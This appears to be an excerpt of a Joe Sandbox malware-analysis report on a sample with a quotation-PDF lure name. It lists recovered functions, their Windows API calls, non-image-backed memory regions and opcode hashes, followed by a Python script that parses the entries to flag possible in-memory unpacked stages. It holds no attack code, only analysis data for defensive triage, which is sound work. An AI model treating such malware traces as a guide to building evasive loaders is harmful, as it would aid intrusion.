                                                        • Instruction ID: e2a9b67dae81175ef7c98c290b0ffa5c924ee83e176230c4ca79498fe86c27b3
                                                        • Opcode Fuzzy Hash: fa0cb39a380625fbae54d8047ef1c1abc0b883d3b25e6a0a5288246b63895902
                                                        • Instruction Fuzzy Hash: 1931EF319042859FDB25EBB4D8A9BDE7FB1FF41308F19886AC041AB351DB35C886CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(?), ref: 02D4D0C2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 37209e4c449df4b0d7872fa74538b87be11784379b59b0ae708ef081a2123479
                                                        • Instruction ID: dc662ababf8fcc8b554e4f6e5b02f0b93dc8550f2f5b76b4daa06383fe094b85
                                                        • Opcode Fuzzy Hash: 37209e4c449df4b0d7872fa74538b87be11784379b59b0ae708ef081a2123479
                                                        • Instruction Fuzzy Hash: AE3148B0D002499FDB14CFA8C9857DEBBF2FB08314F24852AE815A7380DB74A846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(?), ref: 02D4D0C2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 9315c85bef3f98165127a941d1236ea52e73080bde8db68923b0b140bd1bb78d
                                                        • Instruction ID: cf6a572fcd5f5582df0e8dd9ad0a7b83c18da1f2f53f8a3a4c5e6ba579ef8454
                                                        • Opcode Fuzzy Hash: 9315c85bef3f98165127a941d1236ea52e73080bde8db68923b0b140bd1bb78d
                                                        • Instruction Fuzzy Hash: 99312AB0D002499FDB14CFA8D9857DEBBF2FB09314F24852AE855A7380DB74A846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06625221
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: b4e0457bcdf3b94f0455061986400672caa78bbbcdba608a6c8172471de0d735
                                                        • Instruction ID: e4552818fe0cb5781def475f46526b2c9c8fe69e1f6f90a5d601e373f1258c33
                                                        • Opcode Fuzzy Hash: b4e0457bcdf3b94f0455061986400672caa78bbbcdba608a6c8172471de0d735
                                                        • Instruction Fuzzy Hash: 9431D0B1D016599FCB20CF99D984ACEBBF5BF48314F15802AE81AAB354D7709945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f0c0b23eb35771da099c5ab341f9fa12cb299e96b03234d3fd3c6cb5bcfa220b
                                                        • Instruction ID: 03a681c9e05b0aeac098e3238b95139e5e2e4132cf7b9129888800598c01ff4a
                                                        • Opcode Fuzzy Hash: f0c0b23eb35771da099c5ab341f9fa12cb299e96b03234d3fd3c6cb5bcfa220b
                                                        • Instruction Fuzzy Hash: 0121E1359012499FDB24EFB4C999ADE7FB1FF45348F28886AD001A7350CB35C88ACB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06624F64
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 63f022ad516f6721136b112f24bedb94bf4b79db5e858650e79d14b3007637bc
                                                        • Instruction ID: 08aadc9f6ce78d5abb0aa21cb3bd7bff8c0daeb5f5cc4852399e371587cc3132
                                                        • Opcode Fuzzy Hash: 63f022ad516f6721136b112f24bedb94bf4b79db5e858650e79d14b3007637bc
                                                        • Instruction Fuzzy Hash: 533102B0D042499FDB10CF99C584A8EFFF5BF88304F29816AE409AB345CB759985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02D44D62
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID:
                                                        • API String ID: 2118026453-0
                                                        • Opcode ID: 4cac77e4e2aa9f2a83d9689ccde7f28fdb9ed780d684e2da7e5ccf5855fc465a
                                                        • Instruction ID: 15e3b83edff89f7114aec6a0787785e7f2466816a36df8a1ba091c51c179c145
                                                        • Opcode Fuzzy Hash: 4cac77e4e2aa9f2a83d9689ccde7f28fdb9ed780d684e2da7e5ccf5855fc465a
                                                        • Instruction Fuzzy Hash: E92156709027458FCB10DFA9D5097AEBBF8FB49314F14856AD405B7701DB386988CFA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064546F1,00000800,00000000,00000000), ref: 064548E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 2769ad9ffe042255c6257c6de5756701baf955eacabd255d2792506bc076504f
                                                        • Instruction ID: 7e486df83c52324372531fd6612a4150fec230e3d10acd41d19e988e041bf4e0
                                                        • Opcode Fuzzy Hash: 2769ad9ffe042255c6257c6de5756701baf955eacabd255d2792506bc076504f
                                                        • Instruction Fuzzy Hash: 6A1103B6D002499FCB10CF9AD444ADEFBF4EB48324F05842AD915AB301C775A549CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02D44D62
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID:
                                                        • API String ID: 2118026453-0
                                                        • Opcode ID: 50cdf8163eb09104fbeaf1c45db1544f7d4c34a64389e8c2bc269bbf651d4d57
                                                        • Instruction ID: 1967397cbf4751201687327c3e62bdee82f339d80fd072efc489557710a7e40e
                                                        • Opcode Fuzzy Hash: 50cdf8163eb09104fbeaf1c45db1544f7d4c34a64389e8c2bc269bbf651d4d57
                                                        • Instruction Fuzzy Hash: 481156B09017058FCB20DFA9D50879EBBF8FB48314F14852AD406B7700DB39A989CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064546F1,00000800,00000000,00000000), ref: 064548E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 63c2432e4f9ef85b5bdd8c64faf3b51a208b7f64a1b48666fcf54472b79717aa
                                                        • Instruction ID: d67d3f05b91b07ce75d463084232405674644b2631dfec67e3136761ef328a3b
                                                        • Opcode Fuzzy Hash: 63c2432e4f9ef85b5bdd8c64faf3b51a208b7f64a1b48666fcf54472b79717aa
                                                        • Instruction Fuzzy Hash: B41114B6D002499FCB10CF9AD444ADEFBF4EB88324F05842AD819AB300C774A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06454676
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 41fb80533e75b2908cd58da72a04bb2e298c8a8d59b59ef60f0322bdadcf62a0
                                                        • Instruction ID: eac3be2562fc965c41f08839fac5a3b310298e0f8acc35555087fabf9925106e
                                                        • Opcode Fuzzy Hash: 41fb80533e75b2908cd58da72a04bb2e298c8a8d59b59ef60f0322bdadcf62a0
                                                        • Instruction Fuzzy Hash: 4A11FDB1C003498FCB10CF9AC844BDEFBF4AB88324F15842AD829AB600D378A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0645AC15
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: de25e177f2c74fd7768a83dae91b7eebb216c19be055c2515c2ce982f116d10e
                                                        • Instruction ID: 6e5301280ac270cc4c9654ecbd92912173c4c60d2448127b4926109135dc4347
                                                        • Opcode Fuzzy Hash: de25e177f2c74fd7768a83dae91b7eebb216c19be055c2515c2ce982f116d10e
                                                        • Instruction Fuzzy Hash: 621133B09042488FCB10DF99C548BDEFBF4EB48224F14855AD919B7300D774A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0645AC15
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: 813f2b7211a21841b71b3395f230945fbd2a15ea1982fe8abff6ce1ee4e55b5d
                                                        • Instruction ID: 673e3d234f2ddd6d3d022353e3805f9b65936e28511e4b6c9796c4eff3d81c1b
                                                        • Opcode Fuzzy Hash: 813f2b7211a21841b71b3395f230945fbd2a15ea1982fe8abff6ce1ee4e55b5d
                                                        • Instruction Fuzzy Hash: 6C1145B19003488FCB10CFAAD448BCEFBF4EB48324F14865AD529A7340D774A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3afb359906e5fe06237708ef47d07430160b823e5c183de219850706f2f25aec
                                                        • Instruction ID: 9b9829681ad69dac7a835883cfbeb7baa5510914d7c6156e99744ff52910ef06
                                                        • Opcode Fuzzy Hash: 3afb359906e5fe06237708ef47d07430160b823e5c183de219850706f2f25aec
                                                        • Instruction Fuzzy Hash: 8252286205E3C2AFD3034BA4CD616927FB0AF47224B5F45D7D0C0DA6A3D25D8C9AC762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d960df19001c25d924a31e89afec29602f48fc7178ad5f01a73d20f8334bc50d
                                                        • Instruction ID: e9ea417f8e2e0065c957354a2051f66c25a073e340085930b41d5bb7e0450aa4
                                                        • Opcode Fuzzy Hash: d960df19001c25d924a31e89afec29602f48fc7178ad5f01a73d20f8334bc50d
                                                        • Instruction Fuzzy Hash: 0A812D7605A7C1AFD3038B60DC61B917FB0EF47325F1A85E7D084CB6A3D269885AC762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c1240666f776e098ea477ced8b6e4a88ccac012b488bcc77b613157d086df16
                                                        • Instruction ID: c9a35ccfc0480bcc54af23e5b3f8a79b317df2d5ee93cc7f0deb78c0531b00c2
                                                        • Opcode Fuzzy Hash: 5c1240666f776e098ea477ced8b6e4a88ccac012b488bcc77b613157d086df16
                                                        • Instruction Fuzzy Hash: F62125F6514248EFDF11DF98D9C0B2ABF65FB84324F248669EA054B20AC336D846D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5f39013b24550d824844053204c6a64f474deda995a50ae11a6730cfb6fd783
                                                        • Instruction ID: 657163db650f83caa00ed2d9de5becedc87f9ca5d9cf1a2d7fd48b36fb0c9854
                                                        • Opcode Fuzzy Hash: b5f39013b24550d824844053204c6a64f474deda995a50ae11a6730cfb6fd783
                                                        • Instruction Fuzzy Hash: 9C217CB1514248DFCF11DF98E9C0B2ABF65FB88328F24856DEA054B206C336D845D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512774080.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_12ad000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb420f51d0ef62fb4489320e3b666aa3ca967cc9f86075ed6f44ef07fa298c8d
                                                        • Instruction ID: c5e0ec2cfde54c493a871b4c0e219e8fd1c13ab915bee78f659885fcce944dff
                                                        • Opcode Fuzzy Hash: bb420f51d0ef62fb4489320e3b666aa3ca967cc9f86075ed6f44ef07fa298c8d
                                                        • Instruction Fuzzy Hash: 132149B5514240EFDB01DF14D8C0B26BB69FB84324F24C56DEA094B346C37AD847CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction ID: 8f2cee87cd0230bfe01eac8eb08ef60f904be59903256bd6ae226a56d2f4dcc2
                                                        • Opcode Fuzzy Hash: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction Fuzzy Hash: 1F11AFB6504284DFCF12CF58D9C4B56BF71FB84324F2486A9D9050B617C336D45ADBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_129d000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction ID: 822a335ccaea79d7d7bf48f7239697d06496f1e18e353e3d4989379d0ddc671a
                                                        • Opcode Fuzzy Hash: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
                                                        • Instruction Fuzzy Hash: 7111AF76504284DFCF12CF58E9C4B16BF71FB84324F2486A9D9050B616C33AD45ADBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
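Each entry above records, for one recovered function, the API it calls, the memory dump it was lifted from, and whether that dump is backed by a PE image. Reading hundreds of such entries one at a time is impractical, so the script below, an added example that is not part of the Joe Sandbox report or its tooling, parses entries in the report's own line format (the sample input is copied from the entries above, with the Uniqueness lines dropped) and summarises them per dump region: which regions are not backed by an on-disk PE image yet resolve modules at runtime (LoadLibraryExW, GetModuleHandleW), which is what an in-memory unpacked stage looks like, and which Opcode IDs recur with different Instruction IDs. Two things are assumptions rather than report facts: the layout of the .sdmp filename (process index in the first dotted field, region base in the fourth; the script checks the base against the Offset field on the same line) and the list of loader APIs.

```python
"""Triage helper for Joe Sandbox per-function entries (added example, not report tooling)."""
import re
from collections import defaultdict

# Constructed input: entries copied from the report above, in the report's own line format.
SAMPLE = """\
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 02D44D62
Memory Dump Source
• Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
• Opcode ID: 4cac77e4e2aa9f2a83d9689ccde7f28fdb9ed780d684e2da7e5ccf5855fc465a
• Instruction ID: 15e3b83edff89f7114aec6a0787785e7f2466816a36df8a1ba091c51c179c145
Uniqueness Score: -1.00%
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064546F1,00000800,00000000,00000000), ref: 064548E2
Memory Dump Source
• Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
• Opcode ID: 2769ad9ffe042255c6257c6de5756701baf955eacabd255d2792506bc076504f
• Instruction ID: 7e486df83c52324372531fd6612a4150fec230e3d10acd41d19e988e041bf4e0
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 06454676
Memory Dump Source
• Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
• Opcode ID: 41fb80533e75b2908cd58da72a04bb2e298c8a8d59b59ef60f0322bdadcf62a0
• Instruction ID: eac3be2562fc965c41f08839fac5a3b310298e0f8acc35555087fabf9925106e
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
• Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
• Instruction ID: 8f2cee87cd0230bfe01eac8eb08ef60f904be59903256bd6ae226a56d2f4dcc2
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000A.00000002.512734272.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
• Opcode ID: 8760001a56973c006fccc1098cf6934b5270701d3d0f935ddaf206bc60356589
• Instruction ID: 822a335ccaea79d7d7bf48f7239697d06496f1e18e353e3d4989379d0ddc671a
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)$")
HASH_RE = re.compile(r"^•\s*(?P<kind>Opcode|Instruction) ID:\s*(?P<digest>[0-9a-f]{64})$")

# Assumption (not stated by the report): APIs that indicate runtime module/export resolution.
LOADER_APIS = {"LoadLibraryExW", "LoadLibraryW", "LoadLibraryA",
               "GetModuleHandleW", "GetModuleHandleA", "GetProcAddress"}


def parse_entries(text):
    """One dict per function entry; an entry is closed by its 'Uniqueness Score' line."""
    entries, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := API_RE.match(line)):
            cur["apis"].append((m["api"], m["module"], int(m["ref"], 16)))
        elif (m := SOURCE_RE.match(line)):
            fields = m["file"].split(".")
            # Assumed .sdmp layout: <process index>.<stage>.<timestamp>.<region base>...
            # The base field must agree with the Offset printed on the same line.
            base = int(fields[3], 16)
            if base != int(m["offset"], 16):
                raise ValueError(f"dump base {fields[3]} disagrees with Offset {m['offset']}")
            cur.update(process=int(fields[0], 16), region=base,
                       pe_backed=(m["pe"] == "true"), dump=m["file"])
        elif (m := HASH_RE.match(line)):
            cur[m["kind"].lower() + "_id"] = m["digest"]
        elif line.startswith("Uniqueness Score"):
            entries.append(cur)
            cur = {"apis": []}
    return entries


def regions_by_dump(entries):
    """Per region base: function count, API names seen, and whether the dump is image-backed."""
    out = {}
    for e in entries:
        r = out.setdefault(e["region"], {"functions": 0, "apis": set(),
                                         "pe_backed": e["pe_backed"], "process": e["process"]})
        r["functions"] += 1
        r["apis"].update(api for api, _, _ in e["apis"])
    return out


def unbacked_loader_regions(entries):
    """Regions with no PE image behind them that still resolve modules at runtime."""
    return sorted(base for base, r in regions_by_dump(entries).items()
                  if not r["pe_backed"] and r["apis"] & LOADER_APIS)


def opcode_collisions(entries):
    """Opcode IDs seen with more than one Instruction ID: same opcode sequence, different operands."""
    seen = defaultdict(set)
    for e in entries:
        seen[e["opcode_id"]].add(e["instruction_id"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for base, r in sorted(regions_by_dump(parsed).items()):
        print(f"pid#{r['process']:02X} region {base:08X} pe_backed={r['pe_backed']} "
              f"functions={r['functions']} apis={sorted(r['apis'])}")
    print("unbacked regions resolving modules:", [f"{b:08X}" for b in unbacked_loader_regions(parsed)])
    print("opcode collisions:", opcode_collisions(parsed))
```

Run against the whole function list (paste the report's entries into SAMPLE or read them from a file) and the regions it flags are the first candidates to carve out of the sandbox memory dump for static review; the "based on PE: false" regions at 02D40000, 06450000 and 06620000 in this report are exactly the kind of private executable memory the script is looking for.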